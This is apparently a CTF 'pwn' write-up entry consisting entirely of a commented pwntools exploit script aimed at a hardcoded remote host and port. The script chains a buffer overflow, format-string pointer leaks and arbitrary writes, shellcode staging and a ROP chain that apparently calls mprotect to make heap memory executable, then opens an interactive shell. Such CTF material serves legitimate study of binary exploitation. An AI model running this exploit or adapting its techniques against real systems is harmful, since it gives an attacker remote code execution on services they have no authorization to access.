Tags: pwn
Rating: 1.0
```
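import sys

from pwn import *

# Target endpoint. Defaults are the original CTF instance; both can be
# overridden on the command line (`python3 exploit.py HOST PORT`) so the same
# script can be pointed at a local copy of the binary without editing it.
HOST = sys.argv[1] if len(sys.argv) > 1 else '168.119.108.148'
PORT = int(sys.argv[2]) if len(sys.argv) > 2 else 10010

context.arch = 'amd64'
p = remote(HOST, PORT)

# Address the original exploit labels `printf`. The fixed 0x4xxxxx addresses
# throughout suggest a non-PIE, statically linked binary -- TODO confirm
# against the target ELF before reusing any of these constants.
printf = 0x410EE0

# Stage 1: overflow the first "text:" input. 158*3 + 4 = 478 bytes of filler,
# then the printf address. Which field this lands on is not visible from the
# script; the rest of the exploit relies on later input being passed straight
# to printf as its format string.
payload = b'faq' * 158 + b'a' * 4 + p64(printf)
p.sendlineafter(b'text:', payload)

# Stage 2: format-string leaks. `%N$p` prints the N-th vararg. The argument
# indices (12 = a stack pointer, 7 = a heap pointer) and the deltas 0x140 and
# 0x2bf0 are specific to this build; re-derive them if the binary changes.
p.sendlineafter(b'text:', b'%12$p')
stack_leak = int(p.recvline(), 16)
vector_ptr = stack_leak - 0x140
info(hex(stack_leak))
info(hex(vector_ptr))

p.sendlineafter(b'text:', b'%7$p')
heap_leak = int(p.recvline(), 16)
heap_base = heap_leak - 0x2bf0   # logged only; handy when debugging offsets
info(hex(heap_leak))
info(hex(heap_base))

# Stage 3: 2-byte write. `%12$p` showed that argument 12 holds `stack_leak`,
# so `%12$hn` stores the number of characters printed so far into the 16-bit
# word at `stack_leak`; `%Nc` pads N characters first to set that count to
# the low half of `vector_ptr`. Edge case: a width of 0 would still print one
# character (`%0c` is the zero flag with no width), so the pad is omitted
# entirely when the low 16 bits are zero instead of writing 1.
low16 = vector_ptr & 0xffff
pad = f'%{low16}c' if low16 else ''
p.sendlineafter(b'text:', (pad + '%12$hn').encode())

# Stage 4: stage the shellcode. Nothing is printed before `%47$hhn`, so it
# writes a single zero byte through the pointer in argument 47. The rest of
# the buffer carries the shellcode at offset 0x100 and, at offset 0xf90,
# three qwords (printf, vector_ptr+8, 0x200) that look like a forged object
# header the program later dereferences -- not confirmable from here.
payload = b'%47$hhn'
payload = payload.ljust(0x100, b'a')
payload += asm(shellcraft.sh())
payload = payload.ljust(0xf90, b'a')
payload += p64(printf) + p64(vector_ptr + 8) + p64(0x200)
p.sendlineafter(b'text:', payload)

# Stage 5: arbitrary write via pwntools' format-string builder; 8 is the
# vararg index at which our buffer starts. Stores 0x42A0E5 at 0x4C9098 --
# presumably a code pointer the program calls afterwards; the original
# leaves the target unnamed.
payload = fmtstr_payload(8, {0x4C9098: 0x42A0E5})
p.sendlineafter(b'text:', payload)

# Stage 6: ROP chain. With rdi = page-aligned heap address, rsi = 0x21000 and
# rdx = 7 (PROT_READ|WRITE|EXEC), the call to 0x45AC90 is consistent with
# mprotect() -- TODO confirm the symbol. Execution then jumps to
# heap_leak - 0xf10, which matches the stage-4 buffer sitting at
# heap_leak - 0x1010 with the shellcode at +0x100.
pop_rdi = 0x00000000004018da
pop_rsi = 0x0000000000404cfe
pop_rdx = 0x00000000004017df

rwx_base = (heap_leak - 0x1000) & ~0xfff
rwx_len = 0x21000
shellcode_addr = heap_leak - 0xf10

# Sanity check before firing: the jump target must lie inside the region
# being made executable, otherwise the shell lands on a SIGSEGV.
if not rwx_base <= shellcode_addr < rwx_base + rwx_len:
    raise SystemExit(
        f'shellcode {shellcode_addr:#x} outside mprotect range '
        f'{rwx_base:#x}-{rwx_base + rwx_len:#x}'
    )

payload = p64(0)
payload += p64(pop_rdi)
payload += p64(rwx_base)
payload += p64(pop_rsi)
payload += p64(rwx_len)
payload += p64(pop_rdx)
payload += p64(0x7)
payload += p64(0x45AC90)
payload += p64(shellcode_addr)
p.sendlineafter(b'text:', payload)
p.sendline()
p.interactive()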
```